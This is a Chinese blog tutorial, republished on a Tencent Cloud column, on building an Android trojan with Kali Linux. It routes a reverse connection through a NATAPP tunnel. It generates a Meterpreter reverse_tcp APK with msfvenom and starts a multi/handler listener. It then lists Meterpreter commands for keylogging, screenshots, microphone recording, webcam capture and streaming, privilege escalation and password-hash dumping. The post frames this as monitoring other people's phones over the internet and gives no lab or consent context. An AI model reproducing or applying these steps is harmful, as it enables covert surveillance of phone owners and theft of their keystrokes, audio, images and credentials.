前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Kali之安卓木马

Kali之安卓木马

作者头像
知识与交流
发布2021-04-02 14:27:25
2.6K0
发布2021-04-02 14:27:25
举报
文章被收录于专栏:黑客技术家园

Kali linux的安卓木马一般只能在内网操作,要想在监控互联网的安卓手机,必须要使用内网穿透,工具有很多,我使用的是NATAPP。思路如下:

实现内网穿透

Metasploit木马操作

一、实现内网穿透

1.进入https://natapp.cn/,根据提示注册并创建免费隧道

2 进入https://natapp.cn/#download下载linux的客户端

3 命令行内启动natapp。语句: ./natapp -authtoken=************ 后面的星号换成自己的authtoken口令(如果提示权限不够 chmod a+x natapp )

4 得到服务器地址。ping 一下第一个圈内的服务器。得到ip地址是xxx.x.xx.x 后面位端口号:34611

二、Metasploit木马操作

5.生成木马APP。然后输入命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=服务器的ip(上面ping服务器得到的ip) LPORT=34611(上面服务器的端口号) R > /root/apk.apk

34611是设置的端口,显示这个说明已经生成木马成功了,如图:

6.启动msf。msfconsole 然后输入命令:

代码语言:javascript
复制
use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload

修改ip与端口

代码语言:javascript
复制
set LHOST 127.0.0.1 //这里的地址设置成NATAPP中配置的本地ip
set LPORT 2018 //这里的地址设置成NATAPP中配置的本地端口
exploit //开始监听等待木马响应

下面是一些木马的常用命令:

enumdesktops -->列出所有可访问的桌面和窗口站(窗体列表)

getdesktop -->得到当前的Meterpreter桌面

idletime -->返回秒远程用户已经闲置数量

keyscan_dump -->转储按键缓冲(下载键盘记录)

keyscan_start -->开始捕获击键(开始键盘记录)

keyscan_stop -->停止捕获击键(停止键盘记录)

screenshot -->抓取交互式桌面截图(当前操作界面截图一张)

setdesktop -->改变meterpreters当前桌面

uictl -->控制一些用户界面组件(获取键盘、鼠标控制权)

使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)

PS:键盘记录注意点,先开始,后下载,再结束,否则会出错

摄像头:Stdapi: Webcam Commands(摄像头命令)

record_mic -->X秒从默认的麦克风record_mic音频记录(音频录制)

webcam_chat -->开始视频聊天(视频,对方会有弹窗)

webcam_list -->单摄像头(查看摄像头列表)

webcam_snap -->采取快照从指定的摄像头(摄像头拍摄一张照片)

webcam_stream -->播放视频流从指定的摄像头(开启摄像头监控)

其他命令操作

getsystem -->获取高权限

hashdump -->获取当前用户hash

THE END

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-02-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 黑客技术家园 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档